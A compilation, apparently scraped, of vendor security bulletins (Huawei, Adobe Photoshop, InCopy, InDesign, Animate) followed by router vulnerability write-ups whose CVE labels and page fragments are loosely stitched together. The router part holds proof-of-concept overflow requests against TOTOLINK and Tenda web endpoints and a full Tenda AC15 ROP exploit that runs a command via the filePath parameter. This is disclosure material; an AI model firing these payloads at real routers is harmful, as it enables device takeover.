Out-of-bounds write vulnerability in the power consumption module. Successful exploitation of this vulnerability may cause the system to restart.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the August 2022 Android security bulletin:

Critical: none

High: CVE-2021-39696, CVE-2022-20344, CVE-2022-20346, CVE-2022-20347, CVE-2022-20348, CVE-2022-20349, CVE-2022-20350, CVE-2022-20355, CVE-2022-20358, CVE-2022-22080

Medium: CVE-2021-3609, CVE-2022-1055, CVE-2022-20158, CVE-2022-20368, CVE-2022-20371, CVE-2022-27666, CVE-2022-29581

Low: none

Already included in previous updates: CVE-2022-20219, CVE-2022-21744, CVE-2022-20083, CVE-2022-20126, CVE-2022-20133, CVE-2021-35102, CVE-2021-35120, CVE-2021-30318, CVE-2021-1942, CVE-2021-35104

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-40019: Out-of-bounds heap read vulnerability in the HW\_KEYMASTER module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may cause out-of-bounds access.

CVE-2021-40023: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-40024: Information leakage vulnerability in the interface implementation of the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-46836: Information leakage vulnerability in the interface implementation of the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-37008: Vulnerability of the update package not being verified before used in the recovery module

Severity: Medium

Affected versions: EMUI 10.1.1, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect system stability.

CVE-2022-38977: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38978: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38979: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38980: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38981: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38982: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38983: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38984: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38985: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38986: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38987: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38988: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38989: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38990: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38991: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38992: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38993: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38994: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38995: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38996: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect service availability.

CVE-2022-38997: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 12.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2022-38999: Improper update of reference count vulnerability in the AOD module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect integrity, confidentiality, and availability.

CVE-2022-39000: Malicious app control vulnerability in the iAware module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause malicious apps to automatically start upon system startup.

CVE-2022-39001: Path traversal vulnerability in the number identification module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause data leakage.

CVE-2022-39002: Double free vulnerability in the storage module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will cause the memory to be freed twice.

CVE-2022-39003: Buffer overflow vulnerability in the video framework

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability will affect the confidentiality and integrity of trusted components.

CVE-2022-39004: Memory leak vulnerability in the MPTCP module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability can cause memory leak.

CVE-2022-39005: Memory leak vulnerability in the MPTCP module

Severity: Medium

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability can cause memory leak.

CVE-2022-39006: Race condition vulnerability in the MPTCP module

Severity: Critical

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, EMUI 11.0.1, EMUI 12.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the device to restart.

CVE-2022-39007: Permission verification bypass vulnerability in the Location module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may lead to privilege escalation.

CVE-2022-39008: Bundle serialization/deserialization mismatch vulnerability in the NFC module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to read and write arbitrary system app files.

CVE-2022-39009: Permission verification vulnerability in the WLAN module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to affect WLAN functions.

CVE-2022-39010: Permission control vulnerability in the HwChrService module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to obtain the user network information.

CVE-2020-36600: Out-of-bounds write vulnerability in the power consumption module

Severity: High

Affected versions: EMUI 10.0.0, EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, Magic UI 3.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause the system to restart.

Acknowledgment: Wen Guanxing

CVE-2020-36601: Out-of-bounds write vulnerability in the kernel modules

Severity: Medium

Affected versions: EMUI 10.1.0, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause a panic reboot.

Acknowledgment: Wen Guanxing

CVE-2020-36600: September

Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Photoshop | APSB22-52

**Bulletin ID**

**Date Published**

**Priority**

APSB22-52

Sept 13,  2022        

3

**Summary**

Adobe has released an update for Photoshop for Windows and macOS. This update resolves critical and important vulnerabilities.  Successful exploitation could lead to arbitrary code execution and memory leak.

**Affected Versions**

22.5.8 and earlier versions       

23.4.2 and earlier versions

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.    

**Product**

**Updated versions**

**Platform**

**Priority**

Photoshop 2021  

22.5.9

Windows and macOS  

3  

Photoshop 2022

23.5

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**   

**CVSS vector**  

**CVE Number**

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35713  

Access of Uninitialized Pointer (CWE-824)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38426  

Access of Uninitialized Pointer (CWE-824)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38427  

Use After Free (CWE-416)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38428  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38429  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38430  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38431  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38432  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38433  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H  

CVE-2022-38434  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-35713, CVE-2022-38426, CVE-2022-38427, CVE-2022-38428, CVE-2022-38429, CVE-2022-38430, CVE-2022-38431, CVE-2022-38432, CVE-2022-38433, CVE-2022-38434

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-35713: Adobe Security Bulletin

Adobe InCopy version 17.3 (and earlier) and 16.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB22-53

**Bulletin ID**

**Date Published**

**Priority**

APSB22-53

September 13, 2022

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses multiple  critical and an important vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.                    

**Affected versions**

16.4.2 and earlier version  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

17.4  

Windows  and macOS    

3

Adobe InCopy   

16.4.3  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38401  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38402  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38403  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38404  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38405  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38406  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38407  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-38401, CVE-2022-38402, CVE-2022-38403, CVE-2022-38404, CVE-2022-38405, CVE-2022-38406, CVE-2022-38407 )  
    

**Revisions**

July 13, 2022: Bulletin revised for inclusion of CVE-2022-34249, CVE-2022-34250, CVE-2022-34251 and CVE-2022-34252  
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-38406: Adobe Security Bulletin

Adobe InDesign versions 16.4.2 (and earlier) and 17.3 (and earlier) are affected by by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InDesign | APSB22-50

**Bulletin ID**

**Date Published**

**Priority**

APSB22-50  

September 13, 2022   

3

**Summary**

Adobe has released a security update for Adobe InDesign.  This update addresses multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution, arbitrary file system read  
and memory leak.  

**Affected versions**

17.3 and earlier versions  

16.4.2 and earlier versions  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InDesign Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InDesign

17.4  

Windows and macOS

3

Adobe InDesign

16.4.3  

Windows and macOS

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Improper Input Validation (CWE-20)  

Arbitrary file system read  

Critical

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  

CVE-2019-17221\*

  
\*Updating open-source PhantomJS library

\*This CVE is only available in the latest version, ID 17.4

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28852  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28853  

Out-of-bounds Read (CWE-125)  

Memory Leak

Imortant

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28854  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28855  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28856  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28857  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30671  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30672  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30673  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30674  

Out-of-bounds Read (CWE-125)  

Memory Leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30675  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-30676  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38413  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38414  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38415  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38416  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38417  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Yonghui Han of Fortinet's FortiGuard Labs - CVE-2022-28852, CVE-2022-28853, CVE-2022-28854, CVE-2022-28855, CVE-2022-28856, CVE-2022-28857, CVE-2022-30671, CVE-2022-30672, CVE-2022-30673, CVE-2022-30674, CVE-2022-30675, CVE-2022-30676
*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-38413, CVE-2022-38414, CVE-2022-38415, CVE-2022-38416, CVE-2022-38417

**Revisions:**

*   **July 13, 2022:** Bulletin APSB22-30 revised to include (CVE-2022-34245, CVE-2022-34246, CVE-2022-34247, CVE-2022-34248)
*   **July 16, 2022:** Changed CVE-2022-28851 to 3rd party open-source library vulnerability PhantomJS CVE-2019-17221

CVE-2022-28852: Adobe Security Bulletin

Adobe Animate version 21.0.11 (and earlier) and 22.0.7 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security updates available for Adobe Animate | APSB22-54

Bulletin ID

Date Published

Priority

ASPB22-54

September 13, 2022    

3

**Summary**

Adobe has released an update for Adobe Animate. This update resolves critical vulnerabilities.  Successful exploitation could lead to arbitrary code execution in the context of the current user.        

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Animate 2021

21.0.11 and earlier versions

Windows and macOS

Adobe Animate 2022  

22.0.7 and earlier versions  

Windows and macOS  

**Solution**

Adobe categorizes this update with the following  priority rating and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Availability

Adobe Animate 2021       

21.0.12

Windows and macOS  

3

Download Center  

Adobe Animate  2022      

22.0.8

Windows and macOS

3

Download Center       

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.  

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38411  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-38412  

**Acknowledgments**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-38411, CVE-2022-38412)

**Revisions**

June 21, 2022: Revision to affected versions table.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-38411: Adobe Security Bulletin

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to Buffer Overflow via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a buf overflow in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, v7 get from pin,and then pass to v16 , but dont check the length.

finally ,cause overflow.

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": b'a'*0x200 
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38827: CVE/setWiFiWpsStart_2.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setIPv6Status.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setIPv6Status

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from conType and call strcpy, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setIPv6Status"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'conType': payload})

CVE-2022-38830: CVE/setIPv6Status.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setMacFilterCfg.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setMacFilterCfg

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from deviceList

then call sub\_4223E0

finally call strcpy ,dont check the length, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setMacFilterCfg"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'deviceList': payload})

CVE-2022-38829: CVE/setMacFilterCfg.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/SetNetControlList

Permalink

Cannot retrieve contributors at this time

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/SetNetControlList

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from list and send it to sub\_43157C

don't check the length of a1 and call strcpy

**POC**

    url = "http://192.168.1.13/goform/SetNetControlList"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'list': payload})

CVE-2022-38831: CVE/SetNetControlList.md at main · whiter6666/CVE

Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the filePath parameter at /goform/expandDlnaFile.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/expandDlnaFile** filePath parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/expandDlnaFile"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
 
    headers \= {'Cookie': 'password=' + password}
    data \= b'filePath='+ b'A' \* (1074) + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Code in httpd**

**Attack effect**

Tag

#buffer_overflow